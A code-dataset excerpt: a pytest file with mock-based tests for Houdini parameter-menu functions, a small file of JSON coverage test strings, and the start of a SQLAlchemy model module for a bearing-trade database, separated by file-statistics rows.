mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mock_path
mock_parm.parmTemplate.return_value = mock_template
mock_parm.evalAsNode.return_value = None
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("/")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_called()
def test_expression(self, mocker):
"""Test when the path does not match the unexpanded string (is an expression)."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = hou.stringParmType.NodeReference
mock_path = mocker.MagicMock(spec=str)
mock_path.__len__.return_value = 1
mock_path.startswith.return_value = True
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.eval.return_value = mock_path
mock_parm.keyframes.return_value = ()
mock_parm.unexpandedString.return_value = mocker.MagicMock(spec=str)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_path.startswith.assert_called_with("/")
mock_parm.keyframes.assert_called()
mock_parm.evalAsNode.assert_not_called()
def test_not_node_reference(self, mocker):
"""Test when the string parameter is not a node reference."""
mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
mock_template.stringType.return_value = mocker.MagicMock(
spec=hou.stringParmType
)
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
mock_parm.eval.assert_not_called()
def test_not_string_parm(self, mocker):
"""Test when the string parameter is not a node reference."""
mock_template = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm = mocker.MagicMock(spec=hou.Parm)
mock_parm.parmTemplate.return_value = mock_template
result = ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference(mock_parm)
assert not result
class Test_convert_absolute_to_relative_path_context:
"""Test ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context."""
def test_none(self, mocker):
"""Test converting when no parms are suitable to convert."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
return_value=False,
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
result = ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context(
scriptargs
)
assert not result
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
def test_some(self, mocker):
"""Test converting when at least one parm is suitable to convert."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
side_effect=(False, True),
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
result = ht.ui.menus.parmmenu.convert_absolute_to_relative_path_context(
scriptargs
)
assert result
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
def test_convert_absolute_to_relative_path(mocker):
"""Test converting an absolute to relative path."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_relative_reference",
side_effect=(False, True),
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
ht.ui.menus.parmmenu.convert_absolute_to_relative_path(scriptargs)
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
mock_parm1.evalAsNode.assert_not_called()
mock_parm2.evalAsNode.assert_called()
mock_parm2.set.assert_called_with(
mock_parm2.node.return_value.relativePathTo.return_value
)
mock_parm2.node.return_value.relativePathTo.assert_called_with(
mock_parm2.evalAsNode.return_value
)
class Test_convert_relative_to_absolute_path_context:
"""Test ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context."""
def test_none(self, mocker):
"""Test converting when no parms are suitable to convert."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
return_value=False,
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
result = ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context(
scriptargs
)
assert not result
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
def test_some(self, mocker):
"""Test converting when at least one parm is suitable to convert."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
side_effect=(False, True),
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
result = ht.ui.menus.parmmenu.convert_relative_to_absolute_path_context(
scriptargs
)
assert result
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
def test_convert_relative_to_absolute_path(mocker):
"""Test ht.ui.menus.parmmenu.convert_relative_to_absolute_path."""
mock_valid = mocker.patch(
"ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference",
side_effect=(False, True),
)
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
scriptargs = {"parms": (mock_parm1, mock_parm2)}
ht.ui.menus.parmmenu.convert_relative_to_absolute_path(scriptargs)
mock_valid.assert_has_calls([mocker.call(mock_parm1), mocker.call(mock_parm2)])
mock_parm1.evalAsNode.assert_not_called()
mock_parm2.evalAsNode.assert_called()
mock_parm2.set.assert_called_with(
mock_parm2.evalAsNode.return_value.path.return_value
)
class Test_promote_parameter_to_node:
"""Test ht.ui.menus.parmmenu.promote_parameter_to_node."""
def test_target_is_source(self, mocker, mock_hou_ui):
"""Test when trying to promote to the node containing the parms to promote."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_hou_node.return_value = mock_node1
scriptargs = {"parms": (mock_parm1,)}
with pytest.raises(hou.OperationFailed):
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
def test_parm_exists_no_set(self, mocker, mock_hou_ui):
"""Test when the target exists and we don't want to set the target value to the
current value before promoting.
"""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 0
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_not_called()
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_parm_exists_set_value(self, mocker, mock_hou_ui):
"""Test when the target exists and we want to set the target value to the current
value before promoting.
"""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 1
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_parm_exists_cancel(self, mocker, mock_hou_ui):
"""Test when the target exists and we want to cancel."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.__len__.return_value = 1
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTuple.return_value = mocker.MagicMock(spec=hou.ParmTuple)
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
mock_hou_ui.displayMessage.return_value = 2
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_target_node.parm.assert_not_called()
def test_no_existing_single_component(self, mocker, mock_hou_ui):
"""Test when there is no existing parm and we want to promote a single parm from the tuple."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_template1 = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.parmTemplate.return_value = mock_parm_template1
mock_parm_tuple1.__len__.return_value = 3
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_ptg = mocker.MagicMock(spec=hou.ParmTemplateGroup)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTemplateGroup.return_value = mock_ptg
mock_target_node.parmTuple.return_value = None
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = mock_target_node
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_parm_template1.setNumComponents.assert_called_with(1)
mock_parm_template1.setName.assert_called_with(mock_parm1.name.return_value)
mock_ptg.addParmTemplate.assert_called_with(mock_parm_template1)
mock_target_node.setParmTemplateGroup.assert_called_with(mock_ptg)
mock_target_node.parm.assert_called_with(mock_parm1.name.return_value)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_no_existing_multiple_components(self, mocker, mock_hou_ui):
"""Test when there is no existing parm and we want to promote a full tuple."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_template1 = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.parmTemplate.return_value = mock_parm_template1
mock_parm_tuple1.__len__.return_value = 3
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_parm2 = mocker.MagicMock(spec=hou.Parm)
mock_parm2.tuple.return_value = mock_parm_tuple1
mock_parm3 = mocker.MagicMock(spec=hou.Parm)
mock_parm3.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_target_parm2 = mocker.MagicMock(spec=hou.Parm)
mock_target_parm3 = mocker.MagicMock(spec=hou.Parm)
mock_ptg = mocker.MagicMock(spec=hou.ParmTemplateGroup)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTemplateGroup.return_value = mock_ptg
mock_target_node.parmTuple.return_value = None
mock_target_node.parm.side_effect = (
mock_target_parm1,
mock_target_parm2,
mock_target_parm3,
)
mock_hou_node.return_value = mock_target_node
scriptargs = {"parms": (mock_parm1, mock_parm2, mock_parm3)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
mock_target_node.parmTuple.assert_called_with(
mock_parm_tuple1.name.return_value
)
mock_parm_template1.setNumComponents.assert_not_called()
mock_ptg.addParmTemplate.assert_called_with(mock_parm_template1)
mock_target_node.setParmTemplateGroup.assert_called_with(mock_ptg)
mock_target_node.parm.assert_has_calls(
[
mocker.call(mock_parm1.name.return_value),
mocker.call(mock_parm2.name.return_value),
mocker.call(mock_parm3.name.return_value),
]
)
mock_target_parm1.set.assert_called_with(mock_parm1.eval.return_value)
mock_target_parm2.set.assert_called_with(mock_parm2.eval.return_value)
mock_target_parm3.set.assert_called_with(mock_parm3.eval.return_value)
mock_parm1.set.assert_called_with(mock_target_parm1)
def test_no_selection(self, mocker, mock_hou_ui):
"""Test when no target node is selected."""
mock_hou_node = mocker.patch("ht.ui.menus.parmmenu.hou.node")
mock_node1 = mocker.MagicMock(spec=hou.Node)
mock_parm_template1 = mocker.MagicMock(spec=hou.ParmTemplate)
mock_parm_tuple1 = mocker.MagicMock(spec=hou.ParmTuple)
mock_parm_tuple1.parmTemplate.return_value = mock_parm_template1
mock_parm_tuple1.__len__.return_value = 3
mock_parm_tuple1.node.return_value = mock_node1
mock_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_parm1.tuple.return_value = mock_parm_tuple1
mock_target_parm1 = mocker.MagicMock(spec=hou.Parm)
mock_ptg = mocker.MagicMock(spec=hou.ParmTemplateGroup)
mock_target_node = mocker.MagicMock(spec=hou.Node)
mock_target_node.parmTemplateGroup.return_value = mock_ptg
mock_target_node.parmTuple.return_value = None
mock_target_node.parm.return_value = mock_target_parm1
mock_hou_node.return_value = None
scriptargs = {"parms": (mock_parm1,)}
ht.ui.menus.parmmenu.promote_parameter_to_node(scriptargs)
mock_hou_ui.selectNode.assert_called_with(
initial_node=mock_node1.parent.return_value
)
mock_hou_node.assert_called_with(mock_hou_ui.selectNode.return_value)
| 37.426938
| 102
| 0.706807
| 3,743
| 29,455
| 5.199305
| 0.037937
| 0.094394
| 0.105442
| 0.106264
| 0.963774
| 0.959714
| 0.943734
| 0.929911
| 0.922203
| 0.918298
| 0
| 0.008777
| 0.199287
| 29,455
| 786
| 103
| 37.474555
| 0.816366
| 0.083178
| 0
| 0.832323
| 0
| 0
| 0.024006
| 0.021019
| 0
| 0
| 0
| 0
| 0.214141
| 1
| 0.058586
| false
| 0
| 0.006061
| 0
| 0.074747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
764ffb38c7242edada8a2b21e57682674b41250a
| 841
|
py
|
Python
|
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
server/testdata.py
|
msaunby/browser-png-float32
|
7bc35e8b3dee2425554f0efa4f693d0baa0f1b46
|
[
"Apache-2.0"
] | null | null | null |
#
#
#
ubyte_small = """
{
"coverageData": [
{
"values": [
[
0,
127,
255
],
[
1,
128,
254
],
[
2,
129,
253
]
]
}]
}
"""
uint_small = """
{
"coverageData": [
{
"values": [
[
0,
127,
4095
],
[
1,
128,
4094
],
[
2,
129,
4093
]
]
}]
}
"""
float_small = """
{
"coverageData": [
{
"values": [
[
0,
5,
-3
],
[
1000000,
10000,
-100
],
[
0.00001,
0.001,
-0.1
]
]
}]
}
"""
| 10.782051
| 19
| 0.191439
| 42
| 841
| 3.761905
| 0.595238
| 0.322785
| 0.436709
| 0.455696
| 0.341772
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0.673008
| 841
| 77
| 20
| 10.922078
| 0.301818
| 0
| 0
| 0.430556
| 0
| 0
| 0.920048
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
769df70e79af76d3bd73ebfbc1da84ddb431a749
| 47,223
|
py
|
Python
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 1
|
2020-06-21T04:08:26.000Z
|
2020-06-21T04:08:26.000Z
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 13
|
2019-10-18T17:19:32.000Z
|
2022-01-13T00:44:43.000Z
|
app_backend/models/model_bearing.py
|
zhanghe06/bearing_project
|
78a20fc321f72d3ae05c7ab7e52e01d02904e3fc
|
[
"MIT"
] | 5
|
2019-02-07T03:15:16.000Z
|
2021-09-04T14:06:28.000Z
|
# coding: utf-8
from sqlalchemy import Column, Date, DateTime, Index, Integer, Numeric, String, text
from app_backend.databases.bearing import db_bearing
Base = db_bearing.Model
metadata = Base.metadata
def to_dict(self):
return {c.name: getattr(self, c.name, None) for c in self.__table__.columns}
Base.to_dict = to_dict
Base.__bind_key__ = 'bearing'
class AccountPayment(Base):
__tablename__ = 'account_payment'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_ticket = Column(Integer, nullable=False, server_default=text("'0'"))
type_account = Column(Integer, nullable=False, server_default=text("'0'"))
amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
record_date = Column(Date, nullable=False)
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class AccountReceive(Base):
__tablename__ = 'account_receive'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_ticket = Column(Integer, nullable=False, server_default=text("'0'"))
type_account = Column(Integer, nullable=False, server_default=text("'0'"))
amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
record_date = Column(Date, nullable=False)
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Bank(Base):
__tablename__ = 'bank'
id = Column(Integer, primary_key=True)
bank_name = Column(String(100), nullable=False, server_default=text("''"))
type_bank = Column(Integer, nullable=False, server_default=text("'0'"))
initial_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
closing_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BankAccount(Base):
__tablename__ = 'bank_account'
__table_args__ = (
Index('cid', 'cid', 'type_current'),
)
id = Column(Integer, primary_key=True)
bank_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
type_current = Column(Integer, nullable=False, server_default=text("'0'"))
cid = Column(Integer, nullable=False, server_default=text("'0'"))
company_name = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_account = Column(Integer, nullable=False, server_default=text("'0'"))
amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
record_date = Column(Date, nullable=False)
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BuyerOrder(Base):
__tablename__ = 'buyer_order'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_order = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
delivery_way = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_effect = Column(Integer, nullable=False, server_default=text("'0'"))
status_completion = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
effect_time = Column(DateTime)
completion_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class BuyerOrderItems(Base):
__tablename__ = 'buyer_order_items'
id = Column(Integer, primary_key=True)
buyer_order_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
delivery_time = Column(String(128), nullable=False, server_default=text("''"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Cash(Base):
__tablename__ = 'cash'
id = Column(Integer, primary_key=True)
cash_name = Column(String(100), nullable=False, server_default=text("''"))
initial_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
closing_balance = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CashAccount(Base):
__tablename__ = 'cash_account'
__table_args__ = (
Index('cid', 'cid', 'type_current'),
)
id = Column(Integer, primary_key=True)
cash_id = Column(Integer, nullable=False, server_default=text("'0'"))
type_current = Column(Integer, nullable=False, server_default=text("'0'"))
cid = Column(Integer, nullable=False, server_default=text("'0'"))
company_name = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_account = Column(Integer, nullable=False, server_default=text("'0'"))
amount = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
record_date = Column(Date, nullable=False)
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Catalogue(Base):
__tablename__ = 'catalogue'
__table_args__ = (
Index('production_brand', 'production_brand', 'production_model', unique=True),
)
id = Column(Integer, primary_key=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, index=True, server_default=text("''"))
production_label = Column(String(64), nullable=False, server_default=text("''"))
production_brand_old = Column(String(32), nullable=False, server_default=text("''"))
production_model_old = Column(String(64), nullable=False, index=True, server_default=text("''"))
production_class = Column(String(32), nullable=False, server_default=text("''"))
ind = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
oud = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
wid = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
speed_g = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
speed_o = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
weight = Column(Numeric(8, 3), nullable=False, server_default=text("'0.000'"))
serie = Column(String(32), nullable=False, server_default=text("''"))
accuracy = Column(String(64), nullable=False, server_default=text("''"))
preload = Column(String(64), nullable=False, server_default=text("''"))
seal = Column(String(64), nullable=False, server_default=text("''"))
angle = Column(String(64), nullable=False, server_default=text("''"))
r_size = Column(String(64), nullable=False, server_default=text("''"))
r_matel = Column(String(64), nullable=False, server_default=text("''"))
assembly_no = Column(String(64), nullable=False, server_default=text("''"))
assembly_type = Column(String(64), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
tag = Column(String(256), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Category(Base):
__tablename__ = 'category'
id = Column(Integer, primary_key=True)
name = Column(String(100), nullable=False, server_default=text("''"))
main_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Customer(Base):
